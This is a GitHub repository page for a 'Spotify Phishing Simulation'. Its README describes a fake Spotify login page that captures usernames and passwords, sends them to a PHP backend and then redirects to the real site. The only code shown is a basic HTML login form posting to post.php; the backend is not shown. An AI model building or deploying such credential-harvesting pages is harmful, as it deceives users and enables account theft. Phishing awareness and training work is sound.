Skip to content

Création d'une application web imitant Spotify pour collecter et analyser les données d’utilisateurs. Et, utilisation de technologies web (HTML, CSS, JavaScript) pour concevoir une interface réaliste.

Notifications You must be signed in to change notification settings

Chihab357/Phishing-Attack

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 

Repository files navigation

🎣 Spotify Phishing Simulation

Phishing GIF

📌 Project Overview

This project demonstrates a phishing attack by creating a web application that mimics the Spotify login page. The interface captures user credentials and forwards them to the backend, then redirects to the real Spotify page.


🛠️ Technologies Used

  • Frontend: HTML, CSS, JavaScript
  • Backend: PHP

📄 Code

HTML (index.html)

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Spotify Login</title>
</head>
<body>
    <form action="post.php" method="POST">
        <h2>Login to Spotify</h2>
        <input type="text" name="username" placeholder="Username" required><br>
        <input type="password" name="password" placeholder="Password" required><br>
        <button type="submit">Login</button>
    </form>
</body>
</html>

About

Création d'une application web imitant Spotify pour collecter et analyser les données d’utilisateurs. Et, utilisation de technologies web (HTML, CSS, JavaScript) pour concevoir une interface réaliste.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published